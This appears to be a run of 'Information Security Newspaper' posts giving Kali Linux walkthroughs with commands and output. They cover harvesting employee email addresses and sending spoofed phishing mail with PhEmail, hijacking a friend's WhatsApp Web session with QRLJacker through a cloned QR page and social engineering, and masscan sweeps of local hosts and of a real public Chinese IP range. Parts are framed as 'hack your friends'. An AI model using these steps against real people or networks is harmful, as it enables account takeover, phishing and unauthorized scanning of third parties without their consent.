  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Caller ID Results
 [] Number: +52########02  [] Country: MIGUEL HIDAL MX

• Above output shows current location of mobile number. Output can be used in initial phase of foot printing/ reconnaissance method.
• Any unsuspected number can be checked that from which country it belongs.

The post Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step) appeared first on Information Security Newspaper | Hacking News.

• For testing we are using Kali Linux 2019.1 amd64. This tool we are testing on live boot of Kali Linux 2019.1 amd64.

Installation :-

• For cloning type git clone https://github.com/Dionach/PhEmail.git

root@kali:~/Downloads# git clone https://github.com/Dionach/PhEmail.git
 Cloning into 'PhEmail'…
 remote: Enumerating objects: 88, done.
 remote: Total 88 (delta 0), reused 0 (delta 0), pack-reused 88
 Unpacking objects: 100% (88/88), done.

• Type cd PhEmail

root@kali:~/Downloads# cd PhEmail/

• Type ./phemail.py

root@kali:~/Downloads/PhEmail# ./phemail.py
 PHishing EMAIL tool v0.13
 Usage: phemail.py [-e ] [-m ] [-f ] [-r ] [-s ] [-b ]
           -e    emails: File containing list of emails (Default: emails.txt)
           -f    from_address: Source email address displayed in FROM field of the email (Default: Name Surname name_surname@example.com)
           -r    reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname name_surname@example.com)
           -s    subject: Subject of the email (Default: Newsletter)
           -b    body: Body of the email (Default: body.txt)
           -p    pages: Specifies number of results pages searched (Default: 10 pages)
           -v    verbose: Verbose Mode (Default: false)

Usage of Phemail :-

• After starting phemail. You can gather your target email addresses to send malicious email.
• Type ./phemail.py -S google -d example.com -F 1 -p 12
• -S is used to send query on any search engine. We have used google to search for the email addresses of target domain.
• -d is used to gather domain: of email addresses. NOTE: For security of the tested domain we have changed original domain name to example. The above generated list is used in sending malicious email.
• -F is used in format of email addresses. As phemail collects emails from internet using search engine, using this option it will gather email addresses in the form of firstname surname.@example.com
• -p is used to specify no. of mail addresses to be fetch from target domain. Here 12 mail addresses will be fetched.

root@kali:~/Downloads/PhEmail# ./phemail.py -S google -d example.com -F 1 -p 12
 Gathering emails for domain: example.com
 Google Query: example
 ./phemail.py:281: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.
 The code that caused this warning is on line 281 of the file ./phemail.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
 html = BeautifulSoup(data)
 100%
 agus.kurniawan@example.com
 anders.liliegren@example.com
 andrea.wiseman@example.com
 andrew.cavallaro@example.com
 anna.faoagali@example.com
 antonette.sullivan@example.com
 ashfaq-ahmad.jan@example.com
 ayman-al.maaraf@example.com
 bernadette.oulton@example.com
 bobby-esther.mak@example.com
 carolyn.riley@example.com
 danny.wilson@example.com
 dinesh-varma.indukuri@example.com
 doctor.example@example.com

• For testing we have used temporary mail id. Go to
  https://temp-mail.org/en/
• Add the temporary mail in emails.txt

root@kali:~/Downloads/PhEmail# nano emails.txt
   GNU nano 3.2                                                  emails.txt
 halevedopo@direct-mail.info

• Save file, press Ctrl + X Then press Shift + y & press enter.
• Type nano body.txt to create body of the phishing email. Write text which will display in phishing email.

root@kali:~/Downloads/PhEmail# nano body.txt
   GNU nano 3.2                                                   body.txt
 need to talk right now

• Save file, press Ctrl + X Then press Shift + y & press enter.
• Type ./phemail.py -e emails.txt -f “Name Surname name_surname@example.com” -r “Name Surname name_surname@example.com” -s “Subject” -b body.txt
• -e is used to give list of email ids.
• -f is from_address: Source email address displayed in FROM field of the email.
• -r is reply_address: Actual email address used to send the emails in case that people reply to the email
• -s is used to write subject of email.
• -b is used to write body of email.

root@kali:~/Downloads/PhEmail# ./phemail.py -e emails.txt -f "Name Surname name_surname@example.com" -r "Name Surname name_surname@example.com" -s "Subject" -b body.txt
 Domain: direct-mail.info
 SMTP server: mail.direct-mail.info
 ./phemail.py:115: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.
 The code that caused this warning is on line 115 of the file ./phemail.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
 html = BeautifulSoup(body)
 Sent to halevedopo@direct-mail.info
 Domain: outlook.com

• Above query has sent the phishing link on target mail address. The same result is shown in ethical hacking classes of international Institute of Cyber Security
• Below is the testing mail box.

• The above mail box has received the mail.

Analyzing Temporary Mail Header :-

• Opening email header of temporary mail, shows same email address in from & reply:to.

Received: from 127.0.0.1
      by node3 (Haraka/2.8.16) with ESMTP id 5055F1D0-04FF-4831-B67F-CC4EA11CFE35.1 
     envelope-from name_surname@example.com; 
     Wed, 24 Apr 2019 11:55:34 +0000 
 Content-Type: multipart/related;  
  boundary="===============1127976200482479669==" 
 MIME-Version: 1.0 
 from: Name Surname name_surname@example.com
 subject: Subject 
 reply-to: Name Surname name_surname@example.com
 to: josotese@emailapps.info 
 
 This is a multi-part message in MIME format.
  --===============1127976200482479669== 
 Content-Type: multipart/alternative;  
   boundary="===============1585715368107923823==" 
 MIME-Version: 1.0 

 --===============1585715368107923823== 
 Content-Type: text/plain; charset="us-ascii" 
 MIME-Version: 1.0 
 Content-Transfer-Encoding: 7bit 

 This is the alternative plain text message. 
 --===============1585715368107923823== 
 Content-Type: text/html; charset="us-ascii" 
 MIME-Version: 1.0 
 Content-Transfer-Encoding: 7bit 
 need to talk right now 
 --===============1585715368107923823==-- 
 --===============1127976200482479669==--  

• Above shows same email id in from & to.

Tracing Email ID :-

• Further we have traced above header using online email tracer. Go to : https://www.iplocation.net/trace-email

• Email tracer has found location from where mail has send.

The post Send fake mail to hack your friends appeared first on Information Security Newspaper | Hacking News.

Social Engineering attacks still works. Most of the attackers do use social engineering methods to trick targets. According to ethical hacking researcher of international institute of cyber security social engineering methods are used in QRLJacker, a tool that is used in obtaining whats app web sessions. The whole program is written in python. This tool works on principle of phishing. Phishing is a type of social engineering attack in which fake login pages or payment pages are generated to gather credentials of users.

QRLJacker is most common tool used in whatsapp session hijacking which can be helpful in initial phase of pentesting.

• For testing we have used Live Kali Linux 2019.4 amd64. While testing QrlJacker sometimes, QRLJacker was not working on installed versions of Kali linux. We have tested onLive boot of Kali Linux 2018.4, 2018.3 & 2019.1 amd64.
• Geeko driver act as web browser engine used in applications developed by Mozilla. It creates an link between Selenium (an python module) & Mozilla browser. For installing type wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
• Type tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
• Type sudo mv -f geckodriver /usr/local/share/geckodriver
• Type sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
• Type sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
• Remember to update firefox browser. For that type sudo apt-get update & sudo apt-get install firefox-esr
• Type apt-get install python3.7
• Type git clone https://github.com/OWASP/QRLJacking
• Type python3.7 -m pip install -r requirements.txt
• Type python3.7 QrlJacker.py

_____________________________________
!\/        !        \/         ./
!/\        !        |\       ./
!  \       !       /  \    ./
!   \______!______|    \ ,/
!   /\     !    ./\    ,/
! /   \    !    |  \ ,/
!/     \___!____|  ,/   Everything is connected, even the simplest things!
!     / \ _!__ *\,/
!    !   \ !  \,/
!    !  | \! ,/
!----------K/
!    ! ,!  /|     QrlJacker-Framework By @D4Vinci - V2.1
!    !/   / |      Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
!   / \  /  |          Loaded 1 grabber(s), 0 post module(s).
!\./   \/   |
!/\    /    |
!  \  /    .o.
!   \/     :O:
!   /       "
!  /
! /
!/
!
!
!

• Type help

QrlJacker > help

General commands
=================
        Command               Description
        ---------             -------------
        help/?                Show this help menu.
        os      <command>     Execute a system command without closing the framework
        banner                Display banner.
        exit/quit             Exit the framework.

Core commands
=============
        Command               Description
        ---------             -------------
        database              Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
        debug                 Drop into debug mode or disable it. (Making identifying problems easier)
        dev                   Drop into development mode or disable it. (Reload modules every use)
        verbose               Drop into verbose mode or disable it. (Make framework displays more details)
        reload/refresh        Reload the modules database.

• Type list & type use grabber/whatsapp

 QrlJacker > list
 Name              Description
  grabber/whatsapp  Whatsapp QR-sessions grabber and controller
 QrlJacker > use grabber/whatsapp 

• Type options & type set port 1337
• Type set host 192.168.1.7

 QrlJacker Module(grabber/whatsapp) > set port 1337
 [+] port => 1337
 QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
 [+] host => 192.168.1.7 
QrlJacker Module(grabber/whatsapp) > options
 Name       Current value  Required  Description
  port       1337             Yes       The local port to listen on.
  host       192.168.1.7        Yes       The local host to listen on.
  useragent  (default)      Yes       Make useragent is the (default) one, a (random) generated useragent or a specifed useragent 

Type run, you can also run this on port 80 rather than 1337, to look it like a real page of whatsapp

 QrlJacker Module(grabber/whatsapp) > run  

QrlJacker Module(grabber/whatsapp) > run
 [+] Using the default useragent
 [+] Running a thread to keep the QR image  [whatsapp]
 [+] Waiting for sessions on whatsapp
 [+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
 [+] Initializing webserver… [whatsapp]

• After starting Qrljacker server. You can send this link to your target. For testing we have opened generated QrlJacker Code on Windows 7. Type 192.168.1.7:1337

• For usage we have opened on whatsapp 2.19.98. Scan the QR code in Whatsapp web of your mobile or ask your friend to login in whatsapp web using social engineering techniques

• Go to terminal where you have started QrlJacker on Kali. Type sessions Sessions will shows connected Whats app accounts to QrlJacker sessions.

QrlJacker Module(grabber/whatsapp) > sessions
 ID  Module name  Captured on              
  0   whatsapp     Sat-Apr-13-04:53:03-2019 

• As you type sessions -i 0, Kali Linux web browser will open with target Whatsapp account First it will open web.whatsapp.com.

• But after 1 or 2 seconds target Whatsapp account will open.

• Now you can see all the chat of whatsapp.

Practical Video on QrlJacking :-

Above video is posted by a ethical hacking student of International Institute of Cyber Security, Delhi India. In Next publish we will analyse how QRLJacker works

The post Hack Whatsapp account of your friend appeared first on Information Security Newspaper | Hacking News.

According to ethical hacking researcher of international institute of cyber security masscan do helps in scanning phases of pentesting/ VAPT.

Masscan is a tool which scans internet in very short time. It uses asynchronous scanning similar as to nmap. This tool uses custom ports or IPs to scan target. Masscan is the fastest tool to scan for open ports. For showing you, we have tested on Kali Linux 2018.4 in vmware. We will be scanning local IP addresses, whole country IP’s and will show packet analysis in wireshark, to check how the Masscan is noisy on network.

Scanning Local Networks :-

• Here we have created an local network on 3 computers to show you how masscan scan packets. For creating local network.
• 192.168.1.20 & 192.168.1.22 both are the target machine, both are running on windows platform. And attacking machine is the Kali Linux 2018.4

Steps to configure your Virtual Machines IP’s

• For assigning static IP addresses, go to Control Panel/ Network and Internet/ Network Connections.
• Go to local area connection properties. Go to IPv4 connection. Enter IP 192.168.1.20
• Replicate above process with another computer type IP 192.168.1.22
• After creating local network. You can check by pinging to both IP addresses. Open cmd in both computers and type ping 192.168.1.20 and to another computer ping 192.168.1.22
• Now to make ping from Kali Linux you have to create virtual network in the vmware.
• Go to Kali Linux network settings enter static IP. Go to wifi settings select manual type 192.168.1.23 in IPv4 and enter subnet mask 255.255.255.0
• Go to virtual network editor of vmware in windows.
• Select the network editor as shown below. Remember to select appropriate settings.

• As shown above click on Vmnet0 and select network interface card.
• Then click on Vmnet8 and select local ethernet
• Click on apply and ok
• After assigning Then go to Kali Vmware settings and open network settings. Select the virtual network adapter

Moving to installing MASSCAN on KALI

• After assigning static IP addresses to target computers and Kali Linux install required library in Kali Linux before using masscan.
• Type sudo apt-get install git gcc make libpcap-dev in Kali Linux terminal.

root@kali:/home/iicybersecurity/Downloads/masscan# sudo apt-get install git gcc make libpcap-dev
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 make is already the newest version (4.2.1-1.2).
 make set to manually installed.
 The following package was automatically installed and is no longer required:
   php7.2
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   cpp cpp-8 g++ g++-8 gcc-8 gcc-8-base git-man lib32gcc1 lib32stdc++6 libasan5 libatomic1 libcc1-0 libgcc-8-dev libgcc1 libgfortran5
   libgomp1 libitm1 liblsan0 libmpx2 libobjc-8-dev libobjc4 libpcap0.8-dev libquadmath0 libstdc++-8-dev libstdc++6 libtsan0 libubsan1
 Suggested packages:
   cpp-doc gcc-8-locales g++-multilib g++-8-multilib gcc-8-doc libstdc++6-8-dbg gcc-multilib autoconf automake libtool bison gcc-doc
   gcc-8-multilib libgcc1-dbg libgomp1-dbg libitm1-dbg libatomic1-dbg libasan5-dbg liblsan0-dbg libtsan0-dbg libubsan1-dbg
   libmpx2-dbg libquadmath0-dbg git-daemon-run | git-daemon-sysvinit git-doc git-el git-email git-gui gitk gitweb git-cvs
   git-mediawiki git-svn libstdc++-8-doc
 The following NEW packages will be installed:
   libpcap-dev libpcap0.8-dev
 The following packages will be upgraded:
   cpp cpp-8 g++ g++-8 gcc gcc-8 gcc-8-base git git-man lib32gcc1 lib32stdc++6 libasan5 libatomic1 libcc1-0 libgcc-8-dev libgcc1
   libgfortran5 libgomp1 libitm1 liblsan0 libmpx2 libobjc-8-dev libobjc4 libquadmath0 libstdc++-8-dev libstdc++6 libtsan0 libubsan1
 28 upgraded, 2 newly installed, 0 to remove and 1094 not upgraded.
 Need to get 266 kB/37.1 MB of archives.
 After this operation, 2,753 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://ftp.yzu.edu.tw/Linux/kali kali-rolling/main amd64 libpcap0.8-dev amd64 1.8.1-6 [240 kB]
 Get:2 https://ftp.yzu.edu.tw/Linux/kali kali-rolling/main amd64 libpcap-dev amd64 1.8.1-6 [25.9 kB]
 Fetched 266 kB in 9s (28.6 kB/s)
 Reading changelogs… Done
 (Reading database … 342760 files and directories currently installed.)
 Preparing to unpack …/0-libquadmath0_8.2.0-13_amd64.deb …
 Unpacking libquadmath0:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/1-libubsan1_8.2.0-13_amd64.deb …
-------------------------------SNIP------------------------------
 Unpacking libubsan1:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/2-lib32gcc1_1%3a8.2.0-13_amd64.deb …
 Unpacking lib32gcc1 (1:8.2.0-13) over (1:8.2.0-7) …
 Preparing to unpack …/3-libitm1_8.2.0-13_amd64.deb …
 Unpacking libitm1:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/4-libgfortran5_8.2.0-13_amd64.deb …
 Unpacking libgfortran5:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/5-libasan5_8.2.0-13_amd64.deb …
 Unpacking libasan5:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/6-lib32stdc++6_8.2.0-13_amd64.deb …
 Unpacking lib32stdc++6 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/7-gcc-8-base_8.2.0-13_amd64.deb …
 Unpacking gcc-8-base:amd64 (8.2.0-13) over (8.2.0-7) …
 Setting up gcc-8-base:amd64 (8.2.0-13) …
 (Reading database … 342760 files and directories currently installed.)
 Preparing to unpack …/libstdc++6_8.2.0-13_amd64.deb …
 Unpacking libstdc++6:amd64 (8.2.0-13) over (8.2.0-7) …
 Setting up libstdc++6:amd64 (8.2.0-13) …
 (Reading database … 342760 files and directories currently installed.)
 Preparing to unpack …/00-libgomp1_8.2.0-13_amd64.deb …
 Unpacking libgomp1:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/01-libatomic1_8.2.0-13_amd64.deb …
 Unpacking libatomic1:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/02-liblsan0_8.2.0-13_amd64.deb …
 Unpacking liblsan0:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/03-libtsan0_8.2.0-13_amd64.deb …
 Unpacking libtsan0:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/04-libmpx2_8.2.0-13_amd64.deb …
 Unpacking libmpx2:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/05-cpp-8_8.2.0-13_amd64.deb …
 Unpacking cpp-8 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/06-libcc1-0_8.2.0-13_amd64.deb …
 Unpacking libcc1-0:amd64 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/07-gcc-8_8.2.0-13_amd64.deb …
 Unpacking gcc-8 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/08-g++-8_8.2.0-13_amd64.deb …
 Unpacking g++-8 (8.2.0-13) over (8.2.0-7) …
 Preparing to unpack …/1-gcc_4%3a8.2.0-2_amd64.deb …
 Unpacking gcc (4:8.2.0-2) over (4:8.1.0-1) …
 Preparing to unpack …/2-cpp_4%3a8.2.0-2_amd64.deb …
 Unpacking cpp (4:8.2.0-2) over (4:8.1.0-1) …
 Preparing to unpack …/3-git_1%3a2.20.1-1_amd64.deb …
 Unpacking git (1:2.20.1-1) over (1:2.19.1-1) …
 Preparing to unpack …/4-git-man_1%3a2.20.1-1_all.deb …
 Unpacking git-man (1:2.20.1-1) over (1:2.19.1-1) …

• Type git clone https://github.com/robertdavidgraham/masscan.git

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/robertdavidgraham/masscan.git
 Cloning into 'masscan'…
 remote: Enumerating objects: 20, done.
 remote: Counting objects: 100% (20/20), done.
 remote: Compressing objects: 100% (16/16), done.
 remote: Total 4101 (delta 6), reused 8 (delta 4), pack-reused 4081
 Receiving objects: 100% (4101/4101), 2.56 MiB | 17.00 KiB/s, done.
 Resolving deltas: 100% (2778/2778), done.

• Then type cd masscan
• Type make and then make install

root@kali:/home/iicybersecurity/Downloads/masscan# make
 clang -g -ggdb    -Wall -O3 -c src/crypto-base64.c -o tmp/crypto-base64.o
 clang -g -ggdb    -Wall -O3 -c src/crypto-blackrock2.c -o tmp/crypto-blackrock2.o
 clang -g -ggdb    -Wall -O3 -c src/event-timeout.c -o tmp/event-timeout.o
 clang -g -ggdb    -Wall -O3 -c src/in-binary.c -o tmp/in-binary.o
 clang -g -ggdb    -Wall -O3 -c src/in-filter.c -o tmp/in-filter.o
 clang -g -ggdb    -Wall -O3 -c src/in-report.c -o tmp/in-report.o
 clang -g -ggdb    -Wall -O3 -c src/logger.c -o tmp/logger.o
 clang -g -ggdb    -Wall -O3 -c src/main-conf.c -o tmp/main-conf.o -DGIT=\"1.0.5-51-g6c15edc\"
 clang -g -ggdb    -Wall -O3 -c src/main-dedup.c -o tmp/main-dedup.o
 clang -g -ggdb    -Wall -O3 -c src/main-initadapter.c -o tmp/main-initadapter.o
 clang -g -ggdb    -Wall -O3 -c src/main-listscan.c -o tmp/main-listscan.o
 clang -g -ggdb    -Wall -O3 -c src/main-ptrace.c -o tmp/main-ptrace.o
 clang -g -ggdb    -Wall -O3 -c src/main-readrange.c -o tmp/main-readrange.o
 clang -g -ggdb    -Wall -O3 -c src/main-src.c -o tmp/main-src.o
 clang -g -ggdb    -Wall -O3 -c src/main-status.c -o tmp/main-status.o
 clang -g -ggdb    -Wall -O3 -c src/main-throttle.c -o tmp/main-throttle.o
 clang -g -ggdb    -Wall -O3 -c src/main.c -o tmp/main.o
 src/main.c:282:24: warning: passing 'const struct RangeList *' to parameter of type 'struct RangeList *' discards qualifiers
       [-Wincompatible-pointer-types-discards-qualifiers]
         rangelist_sort(&masscan->targets);
  ---------------------------SNIP---------------------------------
 src/ranges.h:200:34: note: passing argument to parameter 'targets' here
 rangelist_sort(struct RangeList *targets);
                                  ^
 src/main.c:284:24: warning: passing 'const struct RangeList *' to parameter of type 'struct RangeList *' discards qualifiers
       [-Wincompatible-pointer-types-discards-qualifiers]
         rangelist_sort(&masscan->ports);
                        ^~~~~~~
 src/ranges.h:200:34: note: passing argument to parameter 'targets' here
 rangelist_sort(struct RangeList *targets);
                                  ^
 2 warnings generated.
 clang -g -ggdb    -Wall -O3 -c src/masscan-app.c -o tmp/masscan-app.o
 clang -g -ggdb    -Wall -O3 -c src/out-binary.c -o tmp/out-binary.o
 clang -g -ggdb    -Wall -O3 -c src/out-certs.c -o tmp/out-certs.o
 clang -g -ggdb    -Wall -O3 -c src/out-grepable.c -o tmp/out-grepable.o
 clang -g -ggdb    -Wall -O3 -c src/out-json.c -o tmp/out-json.o
 clang -g -ggdb    -Wall -O3 -c src/out-ndjson.c -o tmp/out-ndjson.o
 clang -g -ggdb    -Wall -O3 -c src/out-null.c -o tmp/out-null.o
 clang -g -ggdb    -Wall -O3 -c src/out-redis.c -o tmp/out-redis.o
 clang -g -ggdb    -Wall -O3 -c src/out-tcp-services.c -o tmp/out-tcp-services.o
 clang -g -ggdb    -Wall -O3 -c src/out-text.c -o tmp/out-text.o
 clang -g -ggdb    -Wall -O3 -c src/out-unicornscan.c -o tmp/out-unicornscan.o
 clang -g -ggdb    -Wall -O3 -c src/out-xml.c -o tmp/out-xml.o
 clang -g -ggdb    -Wall -O3 -c src/output.c -o tmp/output.o
 clang -g -ggdb    -Wall -O3 -c src/pixie-backtrace.c -o tmp/pixie-backtrace.o

• Type masscan

root@kali:/home/iicybersecurity/Downloads/masscan# masscan
 usage:
 masscan -p80,8000-8100 10.0.0.0/8 --rate=10000
  scan some web ports on 10.x.x.x at 10kpps
 masscan --nmap
  list those options that are compatible with nmap
 masscan -p80 10.0.0.0/8 --banners -oB 
  save results of scan in binary format to 
 masscan --open --banners --readscan  -oX 
  read binary scan results in  and save them as xml in 

• Type masscan to view the help menu.
• Start Wireshark in Kali Linux or host machine and select netwok interface and see the packet analyzing.
• If wireshark is not installed in Kali Linux. Install wireshark from https://packages.qa.debian.org/w/wireshark.html and for windows go to https://www.wireshark.org/download.html

Scanning Target Computers :-

• For scanning type masscan -p0-1000 192.168.1.20 –router-mac <enter mac address>
• 192.168.1.20 is the target computer.
• For knowing mac address open cmd type getmac in target computers.
• -p is used to enter port. You can give an port range -p0-5000 or you can specify and ports of your choice.
• –router-mac is used to enter mac addresses of the target.

root@kali:/home/iicybersecurity# masscan -p0-1000 192.168.1.20 --router-mac <enter mac addresses>
Starting masscan 1.0.6 (https://bit.ly/14GZzcT) at 2019-01-10 12:03:11 GMT
  -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
 Initiating SYN Stealth Scan
 Scanning 1 hosts [1001 ports/host]
 Discovered open port 443/tcp on 192.168.1.20
 Discovered open port 135/tcp on 192.168.1.20
 Discovered open port 912/tcp on 192.168.1.20
 Discovered open port 139/tcp on 192.168.1.20
 Discovered open port 445/tcp on 192.168.1.20
 Discovered open port 902/tcp on 192.168.1.20 

• After running above query, masscan shows list of open ports in the target operating system. If you start wireshark in target machine 192.168.1.20 you can see no. of packets retrieving from attacker 192.168.1.5 machine as shown below.

• The above screenshot shows TCP packet transfer of each packet. The above information can be used in other hacking activities.
• Type masscan -p0-1000 192.168.1.22 –router-mac <enter mac address>
• 192.168.1.22 is the target computer.
• For knowing mac address open cmd type getmac
• -p is used to enter port. You can give an port range -p0-1000 or you can specify and ports of your choice.
• –router-mac is used to enter mac addresses of the target.

root@kali:/home/iicybersecurity# masscan -p0-1000 192.168.1.22 --router-mac <enter mac address>                                         
 Starting masscan 1.0.6 (https://bit.ly/14GZzcT) at 2019-01-10 12:21:21 GMT
  -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
 Initiating SYN Stealth Scan
 Scanning 1 hosts [1001 ports/host]
 Discovered open port 135/tcp on 192.168.1.22
 Discovered open port 445/tcp on 192.168.1.22
 Discovered open port 139/tcp on 192.168.1.22

• After running above query, masscan shows list of ports that are open in the target operating system. The above list can be used to make scenario for attacking further.
• If you start wireshark in target machine 192.168.1.22 you can see no. of packets retrieving from attacker 192.168.1.5 machine as shown below.

• The above screenshot shows TCP packet transfer of each packet. As it showing 3-Way handshaking.
• The above information can be used in other hacking activities.

Scanning Vulnerable IP addresses :-

• There are many sources where you can use tool for testing. Next we have used OWASP iso for scanning open ports.
• Owasp iso is most popular for testing your hacking skills.
• For downloading iso go to https://sourceforge.net/projects/owaspbwa/
• After downloading the owasp iso. Open iso in vmware. Simply start iso.
• After starting iso, you will see your IP address as shown below.

• Enter the IP 192.168.1.10 in web browser to check if iso working as shown below.

• As you can see, iso is working.
• Now for scanning above IP address type masscan -p0-8000 192.168.1.10
• -p is used to enter port ranges.
• Then type IP address.

root@kali:/home/iicybersecurity# masscan -p0-8000 192.168.1.10

Starting masscan 1.0.6 (https://bit.ly/14GZzcT) at 2019-01-10 18:11:29 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [8001 ports/host]
Discovered open port 445/tcp on 192.168.1.10
Discovered open port 443/tcp on 192.168.1.10
Discovered open port 143/tcp on 192.168.1.10
Discovered open port 80/tcp on 192.168.1.10
Discovered open port 139/tcp on 192.168.1.10
Discovered open port 5001/tcp on 192.168.1.10
Discovered open port 22/tcp on 192.168.1.10

• The above query shows open ports of the target IP address. The above information can be used in other hacking activities.

As explained in the ethical hacking course of International Institute of Cyber Security, scanning any random IP with large no, of ports may slow the Kali Linux. Use only limited ports. Or give any short port range. Do not scan any public IP. Your Linux Distros may got hang. If you scan large no. of ports, your ISP may blocks you as large no. of request is send to public IP. Sending Large no. packets may slow the internet.

Analyzing Countries IP Ranges :-

• Masscan can scan with different IP ranges & different ports. Here we have taken China country IP ranges. For IP ranges go to : https://lite.ip2location.com/china-ip-address-ranges

• Type masscan -v -sS 43.225.84.0-43.225.87.255 -p0-100
• -v is used to increase verbosity level.
• 17.50.48.0-17.50.55.255 is ip range used in scanning.
• -sS is used to make TCP syn scan always on.
• -p is used to port ranges. we have used -p0-100

root@kali:~/Downloads/masscan# masscan -v -sS 43.225.84.0-43.225.87.255 -p0-100

Starting masscan 1.0.4 (https://bit.ly/14GZzcT) at 2019-04-10 05:28:06 GMT
  -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
 Initiating SYN Stealth Scan
 Scanning 1024 hosts [101 ports/host]
 THREAD: status: starting thread
 THREAD: xmit: starting thread #0 0:00:00 remaining, found=0
 maxrate = 100.00
 THREAD: recv: starting thread #0
 THREAD: recv: starting main loop
 Discovered open port 53/tcp on 43.225.87.113
 Discovered open port 53/tcp on 43.225.87.45
 Discovered open port 53/tcp on 43.225.87.51
 Discovered open port 80/tcp on 43.225.87.31
 Discovered open port 53/tcp on 43.225.87.39
 Discovered open port 53/tcp on 43.225.87.81
 Discovered open port 53/tcp on 43.225.87.34
 Discovered open port 53/tcp on 43.225.87.104
 Discovered open port 53/tcp on 43.225.87.63
 Discovered open port 53/tcp on 43.225.87.22
 Discovered open port 80/tcp on 43.225.87.195
 Discovered open port 53/tcp on 43.225.87.78
 Discovered open port 53/tcp on 43.225.87.65
 Discovered open port 80/tcp on 43.225.87.69
 Discovered open port 53/tcp on 43.225.87.162
 Discovered open port 80/tcp on 43.225.87.70
 Discovered open port 53/tcp on 43.225.87.133
 Discovered open port 80/tcp on 43.225.87.157
 Discovered open port 80/tcp on 43.225.87.118
 Discovered open port 80/tcp on 43.225.87.55
 Discovered open port 53/tcp on 43.225.87.200
-----------------------------SNIP---------------------------------
 Discovered open port 53/tcp on 43.225.87.163
 Discovered open port 80/tcp on 43.225.87.201
 Discovered open port 53/tcp on 43.225.87.109
 Discovered open port 53/tcp on 43.225.87.59
 Discovered open port 80/tcp on 43.225.87.28
 Discovered open port 53/tcp on 43.225.87.24
 Discovered open port 80/tcp on 43.225.87.160
 Discovered open port 53/tcp on 43.225.87.54
 Discovered open port 80/tcp on 43.225.87.198
 Discovered open port 80/tcp on 43.225.87.187
 Discovered open port 53/tcp on 43.225.87.77
 Discovered open port 53/tcp on 43.225.87.120
 Discovered open port 80/tcp on 43.225.87.72
 Discovered open port 53/tcp on 43.225.87.83
 Discovered open port 53/tcp on 43.225.87.194

• The above query shows initialization SYN scan, ranging port from 0-100. Thread started from default gateway with maxrate of packets. Here 100 packets are sending by default. You can also send large no. of packets to scan IP ranges.
• Meanwhile we have also try to send large no. of packets, after sending large of packets our internet got stuck. Network provider may block your IP address mentions the ethical hacking professor.
• For sending large no. of packets you need Intel 10-gbps Ethernet adapter & special driver called PF RING ZC. Download driver from : https://www.ntop.org/products/packet-capture/pf_ring/pf_ring-zc-zero-copy/
• While scanning with given IP ranges. Masscan has found port 80,53 opened in the IP ranges. Port 53 is used for zone transfers (used in dns enumeration) which can be bypassed by sending UDP packets with port equal to 53.
• While scanning with nmap, it didn’t run with this IP address.
• Type nmap -v 43.225.84.0/255
• -v is used to increase verbosity level.

root@kali:~# nmap -v 43.225.84.0/255
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-10 05:45 UTC
 Illegal netmask in "43.225.84.0/255". Assuming /32 (one host)
 Initiating Ping Scan at 05:45
 Scanning 43.225.84.0 [4 ports]
 Completed Ping Scan at 05:45, 3.04s elapsed (1 total hosts)
 Nmap scan report for 43.225.84.0 [host down]
 Read data files from: /usr/bin/../share/nmap
 Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
 Nmap done: 1 IP address (0 hosts up) scanned in 3.13 seconds
            Raw packets sent: 8 (304B) | Rcvd: 0 (0B)

• Nmap doesn’t scan as we have to use NMAP with -Pn option, as ping might be blocked explains the ethical hacking professor. So overall MASSCAN is relativelvy faster then NMAP any of the host because target IP address range blocking port scanner. But in masscan whole ip range was scanning because masscan has its own TCP/IP stack. While nmap is build on common networking protocols.

